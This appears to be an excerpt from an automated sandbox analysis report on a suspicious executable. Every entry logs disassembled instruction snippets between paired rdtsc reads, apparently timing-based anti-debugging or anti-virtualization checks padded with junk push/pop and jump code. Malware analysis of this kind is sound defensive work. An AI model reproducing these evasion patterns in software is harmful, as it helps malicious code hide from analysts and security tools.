Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B6C95F second address: B6C965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B6C965 second address: B6C96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B6C4CB second address: B6C4CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B6C4CF second address: B6C4EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FC750FDC8F3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B72A14 second address: B72A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B72A18 second address: B72A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B71D86 second address: B71DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750B60C31h 0x00000009 popad 0x0000000a pop esi 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B71ED5 second address: B71EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750FDC8F3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B71EEE second address: B71EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B72060 second address: B7206E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FC750FDC8E6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B7243D second address: B7244E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B7244E second address: B72488 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8EFh 0x00000007 jmp 00007FC750FDC8ECh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FC750FDC8F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B778B7 second address: B778D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FC750B60C32h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B77BBD second address: B77BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B77BC4 second address: B77BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B77EA5 second address: B77EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B20C10 second address: B20C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B78026 second address: B78032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B78032 second address: B78036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B7B88B second address: B7B893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B7B893 second address: B7B899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B80E91 second address: B80E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B80FB1 second address: B80FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B80FB7 second address: B80FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC750FDC8F7h 0x0000000a push esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B8128D second address: B812AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FC750B60C38h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B81840 second address: B81863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push edi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FC750FDC8EFh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B81B7E second address: B81B8B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007FC750B60C26h 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B820F9 second address: B8210D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC750FDC8EAh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B8210D second address: B82111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B823B6 second address: B823BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B823BA second address: B823D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC750B60C2Fh 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B823D7 second address: B823DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B823DD second address: B823E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B823E2 second address: B823E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B826C1 second address: B826C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B826C7 second address: B826F5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC750FDC8E8h 0x00000008 jmp 00007FC750FDC8EBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FC750FDC8F3h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B873C3 second address: B873CF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007FC750B60C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B86C9D second address: B86CA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B86CA1 second address: B86CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750B60C31h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B8BCBC second address: B8BD04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC750FDC8F6h 0x0000000e popad 0x0000000f push edi 0x00000010 jns 00007FC750FDC8F2h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B94341 second address: B94345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B94345 second address: B9435B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B928AB second address: B928ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750B60C2Bh 0x00000009 popad 0x0000000a jno 00007FC750B60C3Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC750B60C33h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B928ED second address: B92914 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC750FDC8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jp 00007FC750FDC901h 0x00000011 pushad 0x00000012 jmp 00007FC750FDC8F3h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B92A38 second address: B92A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC750B60C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B92A42 second address: B92A4C instructions: 0x00000000 rdtsc 0x00000002 js 00007FC750FDC8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B92A4C second address: B92A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC750B60C30h 0x00000009 js 00007FC750B60C26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B92A66 second address: B92A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B92E01 second address: B92E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B92E0E second address: B92E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750FDC8EEh 0x00000009 popad 0x0000000a jbe 00007FC750FDC8E8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B92E2D second address: B92E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B92E31 second address: B92E43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B92FBF second address: B92FF6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC750B60C2Dh 0x00000008 jns 00007FC750B60C26h 0x0000000e pop esi 0x0000000f jmp 00007FC750B60C35h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jng 00007FC750B60C30h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B932FC second address: B93306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC750FDC8E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B93306 second address: B9330C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B9330C second address: B93322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC750FDC8EEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B93A11 second address: B93A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B93A17 second address: B93A35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC750FDC8F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B93A35 second address: B93A41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC750B60C26h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B9A7E3 second address: B9A7F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FC750FDC8E6h 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AE80F2 second address: AE80F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AE80F9 second address: AE8123 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC750FDC904h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B9A36E second address: B9A372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B9A372 second address: B9A39C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC750FDC8E6h 0x00000008 jne 00007FC750FDC8E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop esi 0x00000014 jbe 00007FC750FDC8F2h 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B9A39C second address: B9A3A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BA8347 second address: BA834B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BA834B second address: BA8368 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FC750B60C34h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BA8368 second address: BA83AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pushad 0x00000007 jmp 00007FC750FDC8F9h 0x0000000c push edx 0x0000000d jmp 00007FC750FDC8F9h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007FC750FDC8E6h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC2E08 second address: BC2E20 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC750B60C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC750B60C2Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC2FC5 second address: BC2FFB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC750FDC8E6h 0x00000008 jmp 00007FC750FDC8F7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jmp 00007FC750FDC8F2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC2FFB second address: BC3000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC31B1 second address: BC31BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC750FDC8E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC31BB second address: BC31DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C30h 0x00000007 je 00007FC750B60C26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FC750B60C26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC31DD second address: BC3209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007FC750FDC8FFh 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC339D second address: BC33A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC33A1 second address: BC33A7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC350A second address: BC3541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC750B60C34h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FC750B60C28h 0x00000013 jmp 00007FC750B60C33h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC3541 second address: BC354B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC750FDC8E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC385E second address: BC3862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC3862 second address: BC3868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC3868 second address: BC386E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC386E second address: BC3872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC3872 second address: BC387C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC387C second address: BC3882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC3882 second address: BC388E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC388E second address: BC3894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC4498 second address: BC449E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC8CC5 second address: BC8CDD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007FC750FDC8E6h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ecx 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC89E6 second address: BC89EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BC89EE second address: BC89F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BD2C45 second address: BD2C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BD2C49 second address: BD2C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750FDC8F2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FC750FDC8F9h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BD2C84 second address: BD2C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE0D75 second address: BE0D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE0D79 second address: BE0D83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC750B60C26h 0x0000000a rdtsc
